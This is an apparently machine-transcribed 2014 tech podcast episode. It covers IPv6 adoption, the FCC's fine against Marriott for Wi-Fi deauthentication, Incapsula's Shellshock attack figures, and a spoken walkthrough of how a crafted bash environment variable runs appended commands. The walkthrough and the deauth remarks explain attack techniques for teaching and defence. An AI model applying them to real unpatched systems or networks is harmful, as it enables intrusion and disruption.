On This Week in Enterprise Tech, IPv4 is on the decline, DDoS attacks are on the rise, and we're here to unwrap shell shock with Encapsula and Mudge. Twyatt on the set.
Netcasts you love.
From people you trust.
This is Twit.
Bandwidth for This Week in Enterprise Tech is provided by CacheFly at CacheFly.com.
This is Twyatt, This Week in Enterprise Tech, episode 110, recorded October 3rd, 2014, for October 6th, 2014. Shell Shock Unwrapped. This Week in Enterprise Tech is brought to you by TechServe, the world's largest independent Apple retailer and professional services provider. Go to techserve.com/twyatt-7sins to get access to the free ebook on the 7 deadly sins of iPad deployment. Welcome to Twyatt, This Week in Enterprise Tech. It's the show dedicated to the enterprise professional, the IT pro, and the geek who just wants to know how the world is connected. I'm your host, Father Robert Ballasaire, the digital Jesuit, your guide to all things in the enterprise. And joining me today is my good friend and co-host, Mr. Brian Chi from the Advanced Network Computing Laboratory in Honolulu, Hawaii. Brian, it is hot here in California. How are things over on the islands?
Well, we've got a nice trade wind going. It's in the mid-80s and low 70s for the humidity, so it's actually pretty nice.
Curtis Franklin can't join us today, so you're gonna have to carry his enterprise weight. He's wrapping up at the Interop conference in New York City. But feel like getting to some blips?
Blip away.
Let's go and blip. The first one, well, obviously, Microsoft releases Windows 10. Skipping Windows 9, last Tuesday, Microsoft took the wraps off of their brand new operating system, Windows 10. And it was actually not horrible. Microsoft has abandoned trying to make you use your PC like a tablet or phone, and they've listened to their customers in improving the desktop, making it friendly for enterprise. Among the improvements include persistent identity features that allow you to move seamlessly between devices while keeping permissions, the ability to window modern apps, the separation and protection of personal and corporate data, the ditching of charms, and a host of other UI improvements. The technical preview is available to anyone who signs up for the free program, and the early consensus is that this is what Windows 8 should have been.
Well, my story comes from GigaOm and is reporting that AMD is getting into networking with a new 64-bit ARM processor. In a move that brings the horsepower necessary to take network processing out of custom silicon and into software-defined systems, AMD's new Hyper Falcon provides the network function virtualization in order to ride the wave of SDN that is rising just like the Internet of Things. So instead of waiting for the next Broadcom or Marvell networking chipset, Internet of Things vendors can push emerging network protocols into the device firmware. Just think router, IDS, or proxy on a single chip that doesn't go out of date because of a new protocol. The key to this is just like the ISO network stack. Write hardware primitives that fit like Lego pieces into new protocols written by someone else. Faster protocols to market and faster updates to close security holes.
Remember when Verizon announced that they were going to throttle the biggest users of quote-unquote unlimited data? Well, that brought into question what unlimited data actually means. Today they announced that they were just kidding. Just a few weeks after FCC Chairman Tom Wheeler called Verizon's planned policy change troubling, the wireless company has decided not to use network management as a way to force customers with grandfathered unlimited accounts to usage-based plans. Wheeler immediately responded to the decision by saluting Verizon Wireless's decision to honor the terms of the services that they sold.
Well, you've heard me talk about building video walls. Google is now working on a modular superscreen that snaps together like Lego. So I've built several video walls in recent years, but you basically tile various size monitors with tiny bezels. But for the most part, these systems cost a king's ransom. So most video wall designers tend to use larger screens to build up the big window area for less money. The existing tiny block systems from people like Planar and Phoronix have monitor blocks already talking to each other, but only through massively expensive video processors. The rumor mill is that the Google solution would be similar to a computing cluster with all the blocks talking to each other for display functions, color correction, and a myriad of other video wall-like functions, hopefully also reducing the entrance cost for these ultra-large displays. This could very well be Google's return fire for Microsoft's acquisition of Perceptive Pixels for ultra-large touch displays.
2 months ago, while covering Black Hat 2014, Cheebert and I had the chance to speak with Karsten Knoll and Jakob Lell, two security researchers who had discovered a vulnerability in the way that USB devices work, namely that they feature a reprogrammable controller, which meant that malicious software could own a device's firmware, creating an advanced persistent threat with absolutely no visibility from the outside. It was a scary exploit that was mostly forgotten because Knoll and Lell declined to release their code until some sort of progress could be made on defeating the malware. Well, it looks like our grace time is over. Security researchers Adam Caldill and Brandon Wilson have reversed engineered the hack, and they've published their code on GitHub. In short, time to stop using USB devices. If you want to know why IT professionals are dropping packets all over the place, check out our interview with Knoll and Lell in episode 103 of This Week in Enterprise Tech. Well, that's the blips. Let's get straight to the bites. The first one is, the end of IPv4, or is it? That's right. We've got a story here from Yahoo Finance talking about how Akamai has released their State of the Internet report. It shows that IPv4 has hit its peak and DDoS traffic is actually on the decline as IPv6 picks up. Some of the highlights from the report is that their data comes from over 2 trillion internet transactions that they're a part of each year. From that data, they've reported the following. The average connection speed on the internet is now over 4 megabits per second. South Korea has the world's fastest average internet speed at 24.6 megabits per second. Hong Kong is second at 15.7. The United States is 14th at 11.4 megabits per second. There has actually been a decline in the use of IPv4 addresses, and European carriers are the highest adopters of IPv6. Almost 50% of Verizon's traffic is now IPv6, while DDoS traffic is down because it doesn't work as well over the new protocol. They've also logged 270 attacks in the past 3 months. That's down from 283 in the last quarter and from 346 in the quarter before that. China is still the top source of DDoS traffic with 43% of the DDoS traffic in the world. Cheebert, I want to toss this over to you because anytime we hear Akamai talk about their state of the internet, it's normally a very representative report. It stretches across all the different providers because they're all seeing the same sort of traffic on their network. But my question for you is simple. Is IPv6 really here? We've been hearing about this for the longest time. We've been advocating it. But now that we have hit peak IPv4, it looks like carriers are finally making that switch to pure IPv6 rather than dual stacking.
Well, one of the things I have been finding is I've been digging through DNS queries just because we've been having so many DNS problems. And I've been discovering more and more records have quad A records, so the IPv6 DNS entries. So I think more and more people are finally starting to catch on that, gee, it's kind of painless to add a quad A record. Why don't we do that? And a lot of the ISPs, well, actually a lot of the domain vendors, you know, like GoDaddy and so forth, have started making that as part of their standard setup script. So maybe V6 is finally here, but it kind of snuck in the back door.
Right. Yeah. I think that backdoor was that dual stacking. Most of us have had modems, cable modems, DSL modems, and network devices that had both an IPv4 and an IPv6 address so that when the time came, we could use either. Now that we're running out of IPv4, now that we've run out of IPv4 addresses, there are more and more devices that are going out with only half of that dual stack configuration. Here's another question. IPv6 plus, say, DNSSEC would be a great way to mitigate some of the attacks that you've been seeing recently on your campus. If we were able to secure the DNS system, if we were able to move away from IPv4, what effect do you think that would happen on the number of DDoSes that you see on a daily basis?
It's, you know, everybody keeps saying, oh, it's going to be great. We're going to have a lot less. No, I'm sorry. It's a learning curve. You know, IPv6 does have a lot of functions where it's going to make it harder. But to think that DDoS attacks are going to go away just because we have DNSSEC and IPv6 is, you know, I'm sorry, you know, it's a learning curve. It's going to get caught up eventually. I'm sorry to say a lot of these hackers are really, really, really smart. I've got a lot of respect for them. I just wish they'd use their talents for more constructive purposes.
Yeah, it does feel a little bit like that. Every once in a while, we get that announcement about a technology that's going to cure X or Y. And Victor, if you go ahead and switch over to my screen, you know, that's going to decrease the number of attacks that we're going to feel across the world. And yet we've got this, which is my favorite IP map ever, that shows attacks going on around the world at the moment across the Norse network. It always seems to switch. Whatever technology you put down, they're going to find a way around. So I think IPv6 is causing a decrease in DDoS traffic just because there are networks that are moving away from IPv4. But I believe that once we do make that switch, they're just going to start up their attacks again on 6 with a different set of tools. Is that your general consensus?
Yeah. You know, it's all about learning curves. You know, first it was hacking the phone system with freak boxes and things like that, and now it's the internet, and sooner or later, it's going to be subspace.
Great. Now we're getting into Star Trek. That means we need to move on to the next story. This is something that I want to talk to you about because it's got a lot of good sides and bad sides. Specifically, we're talking about how Marriott has just been fined by the FCC $600,000 for deauthorizing guests off their personal hotspots. Now, hear me out. Between 2012 and 2014, the Gaylord Opryland Hotel and Convention Center in Nashville, Tennessee, which is owned by Marriott, used deauthorization attacks on guests who were using wireless hotspots. Now, this was specifically the guests who were using the convention center. So the vendors who came to set up their tables and their booths were using private hotspots in order to drive the internet in their booth. Now, that in itself is kind of a D-bag thing to do. But the FCC goes on in their complaint to say that not only were they de-authing the guests off their personal hotspots, but they were then charging them between $250 and $1,000 for one of the hotel's wireless connections in order to run their booth. So the FCC came down and said, look, you can't do this. This violates Section 333 of the Communications Act, which, quote unquote, says, no person shall willfully or maliciously interfere with or cause interference to any radio communications of any station licensed or authorized by or under this chapter or operated by the United States government. So it seems like a clear-cut case. Marriott was doing something bad. They were bumping their customers off of their own personal Wi-Fi to force them to buy a connection from the hotel, a connection that many would say was overpriced at $250 to $1,000. So there's that. And I do agree that Marriott was probably on the wrong here. But, Chibert, here's the thing. First, $250 to $1,000 is actually not that much for a connection that you would pay for at a convention center. That's kind of the par for the course. I mean, we've both been involved with Interop, right? I mean, that's the price. That's $1,000 for a connection.
You bet. And actually, your typical network drop for a major convention center is about $5,000 for a 3 to 5 day show.
Right, right. And here's another point. If you've ever been in a convention center, if you've ever tried to do a show in a convention center, you know that personal hotspots are the bane of anyone trying to run a wireless system. In fact, at Interop, we abandon 2.4. We just say 2.4 won't work because everyone with their own personal hotspot is just going to obliterate the RF spectrum. Mm-hmm. So what we ask, we normally say, look, don't turn on your hotspots. They're not going to work. We won't let them work. It's a management thing. So in that sense, I'm wondering, is the FCC overstepping their bounds here?
The reality is it actually isn't so much about the FCC rules, because remember, this is unmanaged. This is unlicensed address RF spectrum. So in one way, why is the FCC even getting involved when they said they're not going to manage that frequency range? But in my mind, it actually comes down to what did the vendors in those booths sign as part of the rental agreement. If they signed an agreement saying that they will pay for internet connectivity, then either Marriott needs to change the verbiage and make it a little more blatant so that it's more upfront, or maybe, just maybe, they might want to consider thinking harder about the cost of a network drop. Because, you know, I don't care what you're doing. If you've got a whole convention center full of personal hotspots, obviously, your personal hotspots aren't going to work with Diddly Squat. Wired is going to be better. So, come on. The convention center has to pay for that internet drop into the convention center year-round, even if there's no convention. So what you're doing is you're helping them pay for the investment. But convention centers also need to be a little more reasonable about the pricing. Otherwise, you're going to get a lot of people cheating and using their own personal hotspots. So even if the rule says no personal hotspots, you can just bet you they're going to hide it under the table anyway.
Right. Something else I do want to touch on, and actually Scotta in the chat room brought up the point. He says FCC has rules covering class licenses for deliberate acts of jamming when there is a clear breach. And I understand that. That is Section 333. But here's the problem. They weren't jamming. When we think of jamming, that's RF jamming. That's throwing out enough radio frequency energy into the air that nothing works. That's interfering with radio communications, either intentionally or accidentally with bad equipment. What we're talking about here is not a jamming attack. Marriott was doing DAuth attacks, and DAuth attacks are nothing new. I could run Kali Linux on my laptop right now and run a DAuth attack on any AP that's near me. In fact, most of the high-end enterprise gear has a DAuth attack option built in so that you can shut down rogue AP points, access points within your campus. A DAuth attack touches the RF frequencies not at all. Everything still works. The only difference is that it uses the management frame of 802.11 wireless to tell any clients to drop their keys and reauthenticate. That's actually a management feature that's built into the protocol. So, you know, my question again is, this seems to be an overreach. FCC is clearly trying to do something right. They're trying to say, you've been messing over your customers. We want to see you pay for that. But this does not seem to be a breach of something the FCC was given enforcement power over. Touched on this before, right, Chibert? Because when we were talking to the guys from Fluke and they showed us the technology that could knock drones or Google Glass off a network, they were very clear they did not run afoul of the FCC because they weren't jamming, they were de-authing.
Correct. And here's the other thing, too. Marriott, I can almost guarantee you, is going to appeal this decision. And the verbiage they're going to be using that I've already heard in a couple of the other stories is, quote, "We are doing this to protect our own network." And if you read between the lines, they're probably going to go and say, yeah, because people can set up little personal hotspots that could de-auth legitimate users, force them onto the hotspot, and put a man-in-the-middle attack. If I was the lawyers and technical people at Marriott, that's the defense I would do. This is probably going to be a landmark case. I don't think the FCC is going to win this one.
Right. And also, we've got Good Sound in the chat room who's saying it wasn't the 2.4 gigahertz range they were jamming. It was the 4G cellular deauthorization. Cellular doesn't work the same way that Wi-Fi does. You can't de-auth a 4G connection. What you can do is you can jam it. You can fill the air with so much RF energy that it downgrades. It pushes down to 2G or 3G, which is not encrypted, and then you can listen in. The story that I read specifically says that they were using off-the-shelf network tools to do network de-auth. Anything that was inside the convention center that was running wireless, they were able to knock them off. But I think you're right. I think this is something that's going to run its course. I definitely think Marriott's going to challenge it because one part of the agreement was that not only will they have to pay $600,000, but that they had to turn over details of any deauthorization protocols they had across the entire chain. That's across the world. Marriott is most definitely going to challenge that in court because that could have a severe effect, not just on their bottom line, but on the way that you run a network in your own campus. Now, let's take one step back, Chibert. Let's say I'm that IT administrator of the 10,000-seat network. On my own campus, in my network, I want the right to kill any rogue AP that someone plugs in. If I have an employee who says, you know what, I don't like the fact that I have to work on this side of the desk, I want to work on that side of the desk, so they plug an Airport Express into my network, I want my APs to automatically find it and kill it. I wouldn't be able to do that. If this stands, the FCC could come in and say, no, you don't have the right to do that. And I'm thinking, it's unlicensed spectrum. It's on my campus. It's on my network. I should have the right to do that.
Well, I think it's one of those things where I'm not sure I want to take either side. Mm. You know, because rogue access points is very, very dangerous. You know, there was a time when I was sitting in a park with a Pringles can antenna, and I actually found someone that had stuck a access point under his desk on the trusted network of a bank. And I was actually seeing financial transactions going across TN3270, which, you know, wow, that's not something I want. And it was so early on that the bank actually didn't even have a policy yet. I strongly encourage the IT administrator that they might want to consider one.
Yeah,
but that's the other side. You know, when you start having rogue access points, you're basically exposing your network because there's no guarantee someone's actually had, you know, tied it into the authentication system or that they're even using strong keys.
Yeah, well, we'll see. This is definitely going to work its way through the courts, and we'll find out if the FCC will yet again have mud on its face. When we come back, we're going to be speaking with Encapsula Networks. They've got some interesting data about the shell shock exploit. But before that, let's take some time to talk about the first supporter of the Twyatt Write It. And folks, it's TechServe. Now, we're seeing some amazing technology solutions being deployed on iPads today. Businesses keep coming up with creative ways to service their customers that involve the iPad. It increases their productivity among employees, and it makes more money with the same resources. In other words, it's a force multiplier, and that's exactly what TechServe is good at. For example, the Institute of Culinary Education equipped students, faculty, and chefs with the iPad, empowering them to do away with heavy and unwieldy textbooks and streamline the learning process. A major cable services provider in the Northeast gave its field technicians, who are the public face of the company, iPads that had been configured to provide better service to their customers. And retail companies have enhanced their in-store customer experience by using the iPad, not just as a point of sale, but also as a spot where customers can come to learn about sales, special offers, and upcoming events. These clients and more have turned to TechServe, the country's largest Apple reseller that sells, supports, and manages the largest iPad deployments in the world to manage their iPad projects. If you're considering adding iPads to your business, why not ensure the project's success with an experienced partner? TechServe assists businesses of all sizes to deploy Apple solutions, as well as solutions from Avid, Adobe, and more throughout the United States. No matter if you've started deploying iPads already or are just getting started, TechServe can help. All right, now TechServe is offering a complimentary download just for Twyatt listeners who are deploying iPads or who are interested in learning more about doing so. Go to techserve.com/Twyatt-7sins to get access to the 7 deadly sins of iPad deployment and see the common pitfalls that throw companies for a loop during their iPad projects. This complimentary download is available right now just for Twyatt listeners at TechServe.com/Twyatt-7sins. And we thank TechServe for their support of This Week in Enterprise Tech. We welcome to the show Tim Matthews from Encapsula. We had Encapsula on a few weeks back right after Black Hat DEF CON talking about a new vulnerability that they had found in WordPress and in Drupal. This time, we're bringing them on to talk a little bit about shell shock. Now, Tim, could you please tell us a little bit about Encapsula? What is Encapsula? What do you do?
Sure. Encapsula is a worldwide network, and we help companies accelerate and secure their network. So in particular, we protect them against web attacks, DDoS attacks, and also accelerate their applications to make them run faster down to the endpoints.
Right. We have you on the show today because of a report that Encapsula published just a few days ago, essentially saying that in 4 days, the 4 days up to that article, since the release of the shell shock exploit, there had been an estimated 1 billion attacks. Now, that includes 217,000 attacks that Encapsula stopped on the 4,115 domains that you protect. Now, that included 890 different IPs from around the world that were the originators of these attack attempts. Have you seen that traffic go up or down since you released that report?
The traffic has remained more or less steady. We came out with that number because people kept asking us, you know, how big is the impact of shell shock? And so we looked at the attack traffic on our network, and we actually extrapolated the worldwide impact based on the total number of websites around the world. And the impact is pretty staggering, as you say, over a billion websites.
Right. Wow. It kind of boggles the mind. In terms of other attacks that we've seen, including Heartbleed, where does this rank on Encapsula's threatometer?
You know, it feels bigger. We can't say for sure. You know, Heartbleed was a bit of a different animal. It's hard to measure exploits against an SSL connection in quite the same way. Here, we're looking at actual attack traffic. We're monitoring the traffic. We're actually tracking the signatures of those attacks coming in. But I tell you, it feels a lot bigger. And the other side of the impact is what you can do when you can break. And it's one thing to steal keys. It's quite another to gain access to someone's network entirely, which is what Shellshock can do.
Right. Yeah, I think that's what I've heard most often, which is Heartbleed, which at the time was the worst thing ever to hit the internet, did allow you to get access to keys and credentials and basically anything that it might have been stored in that buffer. But if you have a successful shell shock attack, you've got most likely root access. You're sitting in front of system it may be, and you can do anything that you would do if you had local control of the device.
Exactly right. So by some measures, it could be worse than Heartbleed, given the keys to the kingdom, so to speak, that you'll get with Shellshock.
Okay. Let's talk a little bit about your tech. So how is Encapsula identifying these attacks? What does the attack traffic look like? What particular signature are you seeking?
So let me just step back a second and explain how we work. We're like a giant reverse proxy in front of the sites and servers that we protect from our customer base. And so we're seeing essentially all the traffic, good and bad, coming through. And what we're doing is looking for particular signatures in that traffic, signatures of the exploit, in this case, of Shellshock, which looks like a bunch of header information with strange symbols in it that, for us, identifies people trying to actually invoke this exploit. And so we're actually looking at these traffic patterns in real time, and we're filtering those out and blocking them and letting the good traffic through. And that's how we actually see all these exploits being attempted against our network.
Right, right. So you're bench basically a firewall even after their firewall, which is
that's right.
Nice.
We're called a web application firewall. So we're essentially, fronting them, in fact, before they even get to the firewall of our customers.
Right. I want to bring in my co-host, Brian Chi, here because we love him because he works in the real world. In fact, he works in one of the realest worlds you're ever going to find for networking, and that is a university campus. Brian, what have you seen? I know you've been paying attention to your traffic the last couple of days. Have you seen any attack traffic go up or down? Is there anything that you can directly correlate to Shellshock?
Sorry, my phone is ringing in lab and it's not hanging up. Anyway, no, we have seen all kinds of really weird and wonderful traffic happening. And we're also currently staggering under a bunch of DNS attacks, which is making my network connection very reliable. Not.
Okay.
But yeah. One of the things that scares me the most about Shellshock is, I've always told people that, most modern operating systems are pretty secure unless you have console access, but that's what Shellshock gives you. So yeah, it's a pretty scary attack, and we've been patching and updating like crazy here.
Right. And actually, Cheaper, what does that look like? So going through all the servers that you have, patching and upgrading, there's sort of this nightmare scenario that's going through the IT forums that I'm a part of, that you've got these administrators who are thinking, is there a box I'm forgetting? Is there a VM I've spun up that I've forgotten to patch or that I've forgotten exists? And they have to go through their entire inventory and thinking about anything they may not have documented in order to make sure it gets patched. Is that happening on your university?
Well, actually, one of the things that's driving me crazy is all these researchers that are just dropping things into the network and they don't tell anyone. And unfortunately, things like WRT, DDWRT, and things like that, a lot of Linux-based systems, some of them are on pretty old versions of embedded Linux, and these clowns aren't updating. So we may still have Shellshock vulnerable machines out there, but we have no clue they're out there. Right. So one of the things we're actually taking a look at is we're actually starting to scan our ARP tables and looking for prefixes for various types of things like Linksys or Netgear and things like that to try and identify these older machines.
Yes, yes. Tim, let me ask you about that. Have you been giving any advice to your clients? Because, of course, you're protecting them, but are you trying to push them towards scanning their own networks, their own machines, to see if they've got any vulnerable machines that are open to the outside world?
We always recommend that. So on the off chance that somebody did get in, or if there's somebody on the inside, like was just suggested now, we do recommend that our customers scan their networks and patch the systems they believe to be the most vulnerable. We've seen all kinds of bad stuff getting dropped onto systems in the attack signatures. So we know the customers need to get in there and patch their own networks.
Okay. Let's go through a few of the scenarios that I've been drawing up. The first one is that this new class of exploit that gets us unprecedented access to a box could reinvigorate botnets that have died or have been severely weakened over the last couple of years. Have you seen any traffic, especially since you have a really nice footprint on the internet, that might suggest that Shellshock is being used to either add new command and control nodes or a new army of zombies?
We have definitely seen signs of botnet shepherds trying to reinvigorate or, you know, recompile their networks. When we look at the traffic, about 20%, just shy of 20% of the traffic was what we call DDoS malware, people looking to insert malware on systems to essentially turn those machines into zombies to then recruit them into their botnets. So we've definitely seen signs of that.
Wow, that's kind of scary, actually.
Yeah.
You can't directly correlate that to Shellshock, right? I mean, or can you actually look at the data and say, look, right when Shellshock was announced, as the tools were coming out, that's when we started seeing the CNC traffic again?
We definitely saw it during that four-day period. We saw an uptick, and we correlated it with actual Shellshock attacks based on the signatures, the CVEs
wow.
that we were tracking. So we can directly correlate that 20% of the attack traffic to Shellshock, and the 20% is to do with a botnet malware.
Wow. Okay. I had no idea there was a direct correlation. I think that's the scariest thing I've heard so far. Let's move on to something related to that. Have you been able to identify any particular tools that are being used to exploit the Shellshock vulnerability? Or is this such an easy exploit to do? It's just a couple of lines that you append to a bash command that no one needs to use a Metasploit or a dedicated tool for it.
It's pretty simple, I'm sorry to say. I mean, we have not identified a tool. We've seen a lot of Perl and Python scripts, which, as you know, is pretty basic stuff. And so it's not hard to get a hold of. It's not hard to write code, simple scripts that actually can exploit the exploit, so to speak.
Oh, wow. Well, what about the initial ping sweep? So we know that the way that you would set up an attack would be scan a large range of IPs, look for a response that tells you that I've got some sort of access, perhaps to the CGI, that I can then try the bash exploit. Are you seeing that traffic? Are you able to isolate that sweeping traffic, that probing traffic, or is that just background noise?
No, actually. So 70% of the traffic that we've seen has been probing for Shellshock vulnerabilities. Now, I guess the good news is 6% of the 70%, so 5% or so, has been seemingly commercial scanners we presume to be used by organizations. But the rest of that traffic seems to be malicious. So a large part, and especially in the early part of our scanning or recording of these scans, has come from malicious scanners. And there was a big, big spike, as you'd expect, from the bad guys, whoever they may happen to be, looking for vulnerabilities right away, presuming in that first 24, 48 hours, there wouldn't be time to patch all the systems.
Wow. Wow. Jeebert, let me bring you back in here. Have you seen any attack traffic increase on your network, either an increase in the number of probes that you get or in botnet suspicious activity?
I've actually been absolutely buried just trying to keep up with a lot of different things. But yeah, my firewalls are seeing a lot more traffic. The good news is the Sonic Wall was never vulnerable to this attack, but any machines that had, say, SSH ports or different types of other ports open, those are the ones that we're most worried about. So we've been going through closing down firewall holes that people might have asked for that don't need anymore. We've been going through and finding machines. So, yeah. As far as traffic goes, big, big uptick. The number of log dumps off our firewall has gone up significantly. The number of people that are doing bash exploits that we see in the logs have gone up exponentially. Only, you know, I can only say for my college, you know, the rest of the university doesn't share their data with me. But, oh, my God, yeah, we've seen an awful lot of traffic going up trying to find vulnerable machines.
Tim, I want to take you down the rabbit hole a little bit. Here's a little call out to the conspiracy theorists out there. There are those who are saying that this kind of exploit that is so powerful and yet requires you to actually do something, you have to physically want to get into certain machines, kind of lends itself as a backdoor for governments and corporations. They're the ones who can actually bring enough resources to bear to make those mass probe attacks and specifically go after pieces of infrastructure. Have you seen anything in your data to suggest that there are targets, that people are actually going at specific resources, specific networks, or is the traffic more or less random, just going after whatever's available, whatever's open?
You know, that's hard to say. Of course, you know, in our case, you know, we only got a certain set of customers, so we don't have every high-profile target or every government on our network, obviously. So, you know, the conspiracy theorist in me says that, of course, this would be a great opportunity for governments who perhaps were shut out in some way to get in. It's a chance. But then again, shell shock seems to be an equal opportunity vulnerability. And given the fact that a lot of the attacks, or I should say the traffic we're seeing, looks like botnet preparation, I wouldn't doubt that there are criminals as well as governments looking to get on the action here.
Right. Let's take one step back really quickly and ask about, as you look through the traffic, what would you expect to see? Because, of course, right now you're seeing a lot of probes. Where do you think is the cutoff? Where's the point at which you say, okay, now we know what systems are vulnerable, we know which systems are attacking, and we're starting to fall into a categorical pattern?
So I think if I understand you correctly, what we're seeing now is the initial scans and a rush to try and get into these systems. You see the spikes on the graph that you're bringing up on the screen there, and a bit of a rise on Monday. And what we expect to see now is a lot of utilization of the back doors that were inserted on systems, which is very difficult to track for companies to see the traffic coming back out. It's very difficult to find those back doors. And we're going to be keeping an eye on a rise in botnet traffic, the resuscitation of some of these botnets that we thought had been snuffed out. So we think there might be a bit of a lull. We think that some of the criminals are counting on the fact that people will have this false sense of confidence once they've patched their systems, but that some of the infected machines will then be able to be used in botnet attacks, or some of the back doors will be used for various exploits.
Fantastic.
And if I could just add, this is a great reason not only to make sure you patch all your systems internally, but make sure you continue to monitor your network, which is obviously best practice always, but you're going to have to stay on this for a while now.
Yeah. Actually, let's talk about that, staying on this for a while, because I think that is something that every IT manager needs to take seriously, this idea of the advanced persistent threat, that someone may compromise the system with the bash exploit, with shell shock, not do anything immediately, but, as you mentioned, leave a way for them to get back in, or leave something that pings out to see if I want something to do, to do something. That's a new level of security that a lot of IT managers aren't used to. So they should probably turn to a company that does application firewalling like Encapsula?
So I think most people are used to thinking of endpoints as getting compromised and endpoints becoming participants in botnets. Now what we're seeing is the potential for a huge number of servers to be utilized in this same fashion. I think you're right. Sysadmins, IT managers aren't used to seeing this style of attack in a large scale against servers. And so they need to start thinking about that and start using a technology, you know, whether it's us or someone else, that from the cloud is able to monitor traffic going both ways, in and out of your network. So you can actually see what the traffic is actually trying to accomplish, whether it's a backdoor extraction or some kind of botnet activity coming from your network. And so people need a technology and a way to actually be able to monitor that, not just today or tomorrow or next week, but, you know, for the foreseeable future.
Cheebert, have we played around with any solutions, either at Interop or in your lab, that that do this kind of protection? And of course, Encapsula does provide that service. But is there something that I would be able to install in my IT plant that could give me that kind of visibility where I could actually start looking for advanced persistent threats?
Yeah, actually, the web application firewall features within the SonicWall UTMs have that kind of capability. And to a certain extent, our friends at IDIS Networks, I believe, have some visibility into that. I'm not sure if it's the same extent because it's more just looking for threats rather than specific threats. But I would imagine that we could probably call Jock and those folks and find out how far they can look into this and how they're responding to shell shock.
Right. I think this is a great time for everyone, no matter how small your network is, to have a little bit of visibility into the packets flowing through it. Now, Tim, I want to give you the last question here. This is probably the most obvious, and that is, how is it that Encapsula is protecting its customers? So give us from packet to packet, from end to end, how do you stop these sweeps? How do you stop the attack traffic? And how perhaps can we break up command and control communications for botnets and APSs once they've been established?
Sure. So as I said earlier, we're a giant reverse proxy in the cloud. So we're seeing all the traffic coming in and out of our network on the way to our customer servers and on the way back again. And so we can examine all this traffic and accelerate the good traffic and then look for signatures and bot activity that we can then basically extract out. And so we're doing this, you know, every day, every second for all of our customers. And we've built up this knowledge base of bad actors, bad IPs, bad signatures, which is then crowdsourced across our entire network. So every customer benefits from an exploit against just the one customer. And so this is where we're able to monitor traffic on the way in, so block the exploits we're talking about. We also can monitor the backdoors, the traffic coming back out of the network, so whether it's a botnet or some other exploit coming back out of the network. And so this is where working in the cloud, not just on a single campus, but across a campus and two cloud data centers, for example, running through the cloud really is the way you can see all of the traffic in and out of your applications.
Tim Matthews from Encapsula.com, I want to thank you for coming on This Week in Enterprise Tech and for sharing your knowledge and your company's report on shell shock. Could you please tell the folks at home, the members of the Twilight Right, where they can find out more about you, Encapsula, and what your company does?
Sure. I would suggest you go to Encapsula.com and try our product for 2 weeks for free and watch the traffic on your network. You'll be able to see all the botnet activity, all the exploits that are blocked, and you can actually see potentially shell shock in action on your own network.
We thank Tim Matthews for joining us from Encapsula. And now it's time to bring in our featured guest, often here on TWiET. He is our security guru, the man who does scare us quite the most. It's Mr. Raphael Mudge, the Armitage hacker, advanced pen tester that he is. Raphael, thank you very much for coming back on This Week in Enterprise Tech.
Hey, Padre. Glad to be back.
Now, we had you on last week very briefly. You were incredibly tired. You had just come back from a conference, and you were still going through some of the early information about shell shock, this bash exploit that's taking advantage of, I'm not going to even call it a bug, I'm going to call it a feature from when bash was first created all those decades ago to run remote code. Since then, you've had a chance to look at the code, to look at the exploit, to actually figure out how it works. And here you are to show us exactly how big of a problem this is. So let me start off with that. How big of a problem is this?
Okay, sure. So one of my favorite discussions on shell shock comes from Dave Itel of Immunity Inc. And Dave Itel compares shell shock to soap in the shower, okay? Everyone's got a shower, and depending on how clean you are, you probably have soap in your shower, right?
Mm-hmm.
And that's bash. Bash is ubiquitous. This flaw is soap in your shower. It's a problem on your computer. Now, how likely is it you're going to slip on the soap in your shower and fall to your death? Now, some people do. They slip on the soap in their shower and they die. And that's a really sad thing. And if that happens to anybody in the TWiET community, I'm very sorry about making light of it. But for the rest of us, having soap in the shower, well, it's bad. it's not that big of a deal. And we're going to go through some of the demos here to kind of show some of the things you have to do before you actually slip on this bug and die. Okay.
Okay. So this is kind of strange and ominous all at once. And I think I am properly scared. Now, show me how it would work, say, locally. So we understand that this is appending some commands to a bash script, which allows me to take control even if I'm remote. If I were local, what would it look like?
Okay, sure. So what I'd like to do is if we could put it on my screen right there. Excellent. All right, what we're going to do is we're going to go through this. So first things first, let me explain what we're dealing with here. I'm sitting in a shell, and I mentioned before this is a command interpreter. I type a command, you get output. And a lot of programs will invoke the shell, meaning run it, and ask it, hey, run this command for me, give the output back. That's a normal thing in many programs, not extremely common, but it's normal, okay? And the environment, well, that's kind of ugly to look at, is things you can set, variables that can be used to kind of reconfigure what the shell is going to do. For example, I can configure a variable called PS1 to change my prompt. Let me do it right now. And you see how my prompt is now little dollar sign?
Right.
So that's the environment. It just reconfigures your bash instance and any programs that run afterwards. Now, shell shock, what does this look like? Well, a lot of programmers assumed that data that went into this environment, went into these variables, was safe, and there was no path to actually execute code through it. That's not quite true. So let me run something with bash without changing the environment, and then we'll change the environment, put code in it, and see just how evil this is.
All right.
So first things first, let's do we got our PS1. So we'll do export foo equals bar, and then we'll just do bash-c and ask it to run who am I. Okay?
All right.
And you see when we run bash, tell it to run the command who am I with the environment variable foo equals bar, all's well and good in life, right? Nothing's wrong. Everybody's happy. Now let's put some evil code into foo and watch what happens when we run bash. So what we're going to do is we're going to create what looks like a bash function. And the surprise to programmers is that this little bit of code to define a bash function causes bash not to treat this environment variable as a string, as just data, but to actually treat it as bash code and evaluate it. So it evaluates the function, so it could be presumably called elsewhere, but then we can append to this function what we want to run next. So we'll do bin echo z, oh my God, run for your life. Let's put some double quotes.
And because it thinks it's just changing an environment variable and it's not actually doing anything executable, there's nothing that's going to stop this. Oh, no.
That was beautiful.
That's so not good.
I made excellent. I don't care. It ran my bad stuff. I don't care if the real program crashed. That's not quite typical. Let me try. It doesn't really matter because I'm going to go through other demos. But yeah, I crashed. Who am I?
Right.
That's called skill right there, right? So anyways, keep it on the demo. We're going to keep going through that. What I want you to see is that when I ran who am I, after malicious data had been put into that environment, I was able to run whatever I wanted. In this case, I changed it to Z, oh my God, run for your life. Okay?
But that's relatively benign. All you've done is you've asked it to echo. But you could have put anything in there. You could have added to that environment variable pretty much any command that would be executed as root, because bash is often run as root, which when it got bashed would give a remote attacker complete control of your computer.
